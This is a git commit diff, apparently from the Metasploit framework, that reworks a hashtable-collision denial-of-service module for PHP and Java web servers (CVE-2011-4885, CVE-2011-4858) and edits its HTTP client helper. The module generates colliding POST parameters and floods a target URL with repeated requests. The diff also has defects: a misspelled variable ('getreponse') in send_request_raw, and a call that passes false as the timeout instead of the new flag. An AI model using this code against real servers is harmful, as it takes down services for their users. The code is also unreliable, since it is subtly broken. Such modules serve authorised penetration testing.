Switched to Http Library, Code formatting issues
Christian Mehlmauer
parent
dc10fac885
commit
b298597218
|
|
@ -247,11 +247,11 @@ module Exploit::Remote::HttpClient
|
|||
#
|
||||
# Passes +opts+ through directly to Rex::Proto::Http::Client#request_raw.
|
||||
#
|
||||
def send_request_raw(opts={}, timeout = 20)
|
||||
def send_request_raw(opts={}, timeout = 20, getresponse = true)
|
||||
begin
|
||||
c = connect(opts)
|
||||
r = c.request_raw(opts)
|
||||
c.send_recv(r, opts[:timeout] ? opts[:timeout] : timeout)
|
||||
c.send_recv(r, opts[:timeout] ? opts[:timeout] : timeout) if getreponse == true
|
||||
rescue ::Errno::EPIPE, ::Timeout::Error
|
||||
nil
|
||||
end
|
||||
|
|
@ -262,11 +262,11 @@ module Exploit::Remote::HttpClient
|
|||
#
|
||||
# Passes +opts+ through directly to Rex::Proto::Http::Client#request_cgi.
|
||||
#
|
||||
def send_request_cgi(opts={}, timeout = 20)
|
||||
def send_request_cgi(opts={}, timeout = 20, getresponse = true)
|
||||
begin
|
||||
c = connect(opts)
|
||||
r = c.request_cgi(opts)
|
||||
c.send_recv(r, opts[:timeout] ? opts[:timeout] : timeout)
|
||||
c.send_recv(r, opts[:timeout] ? opts[:timeout] : timeout) if getresponse == true
|
||||
rescue ::Errno::EPIPE, ::Timeout::Error
|
||||
nil
|
||||
end
|
||||
|
|
|
|||
|
|
@ -13,12 +13,12 @@ require 'msf/core'
|
|||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Hashtable collisions',
|
||||
'Name' => 'Hashtable Collisions',
|
||||
'Description' => %q{
|
||||
A variety of programming languages suffer from a denial-of-service (DoS) condition against storage functions
|
||||
of key/value pairs in hash data structures, the condition can be leveraged by exploiting predictable collisions
|
||||
|
|
@ -47,16 +47,14 @@ class Metasploit3 < Msf::Auxiliary
|
|||
['CVE', '2011-4885'],
|
||||
['CVE', '2011-4858']
|
||||
],
|
||||
'DisclosureDate' => 'Dec 28 2011'))
|
||||
'DisclosureDate'=> 'Dec 28 2011'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(80),
|
||||
OptEnum.new('TARGET', [ true, 'Target to attack', nil, ['PHP','Java']]),
|
||||
OptString.new('URL', [ true, "The request URI", '/' ]),
|
||||
OptInt.new('RLIMIT', [ true, "Number of requests to send", 50 ]),
|
||||
OptString.new('VHOST', [ false, "Name of VHost", nil ]),
|
||||
OptBool.new('VERBOSE', [ false, "Verbose Output", true ])
|
||||
OptInt.new('RLIMIT', [ true, "Number of requests to send", 50 ])
|
||||
], self.class)
|
||||
|
||||
register_advanced_options(
|
||||
|
|
@ -132,7 +130,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
@recursivecounter = @recursivecounter + 1
|
||||
hashes = computeCollisionChars
|
||||
else
|
||||
if datastore['VERBOSE']
|
||||
print_status("Found values:")
|
||||
hashes.each_value {|item|
|
||||
print_status("\tValue: #{item}\tHash: #{@function.call(item)}")
|
||||
|
|
@ -141,7 +138,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
}
|
||||
}
|
||||
end
|
||||
end
|
||||
return hashes
|
||||
end
|
||||
|
||||
|
|
@ -150,16 +146,17 @@ class Metasploit3 < Msf::Auxiliary
|
|||
result = start
|
||||
inputstring.each_char {|item|
|
||||
result = result + ((base ** counter) * item.ord)
|
||||
counter = counter - 1 }
|
||||
counter = counter - 1
|
||||
}
|
||||
return result.round
|
||||
end
|
||||
|
||||
#PHP's hash function
|
||||
# PHP's hash function
|
||||
def DJBX33A(inputstring)
|
||||
return DJBXA(inputstring, 33, 5381)
|
||||
end
|
||||
|
||||
#Java's hash function
|
||||
# Java's hash function
|
||||
def DJBX31A(inputstring)
|
||||
return DJBXA(inputstring, 31, 0)
|
||||
end
|
||||
|
|
@ -183,14 +180,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
exit
|
||||
end
|
||||
|
||||
if datastore['RPORT'] == "443"
|
||||
datastore['SSL'] = true
|
||||
end
|
||||
|
||||
if datastore['VHOST'].nil? || datastore['VHOST'].blank? || datastore['VHOST'].empty?
|
||||
datastore['VHOST'] = "#{datastore['RHOST']}:#{datastore['RPORT']}"
|
||||
end
|
||||
|
||||
print_status("Generating Payload...")
|
||||
payload = generatePayload
|
||||
return if payload == nil
|
||||
|
|
@ -203,34 +192,13 @@ class Metasploit3 < Msf::Auxiliary
|
|||
print_status("Payload generated")
|
||||
|
||||
for x in 1..datastore['RLIMIT']
|
||||
begin
|
||||
connect
|
||||
print_status("sending Request ##{x}...")
|
||||
|
||||
sploit = "POST #{datastore['URL']} HTTP/1.1\r\n"
|
||||
sploit << "Host: #{datastore['VHOST']}\r\n"
|
||||
sploit << "Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n"
|
||||
sploit << "Connection: Close\r\n"
|
||||
sploit << "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.20 ( .NET CLR 3.5.30729; .NET4.0E)\r\n"
|
||||
sploit << "Content-Length: #{payload.length}\r\n"
|
||||
sploit << "\r\n#{payload}\r\n\r\n"
|
||||
|
||||
if datastore['VERBOSE']
|
||||
if sploit.length > 400
|
||||
puts sploit[0,400] + "...."
|
||||
else
|
||||
puts sploit
|
||||
end
|
||||
end
|
||||
|
||||
sock.put(sploit)
|
||||
disconnect
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
print_error("Unable to connect to #{rhost}:#{rport}.")
|
||||
disconnect
|
||||
rescue
|
||||
disconnect
|
||||
end
|
||||
opts = {
|
||||
'method' => 'POST',
|
||||
'uri' => datastore['URL'],
|
||||
'data' => payload
|
||||
}
|
||||
send_request_cgi(opts, getresponse = false)
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue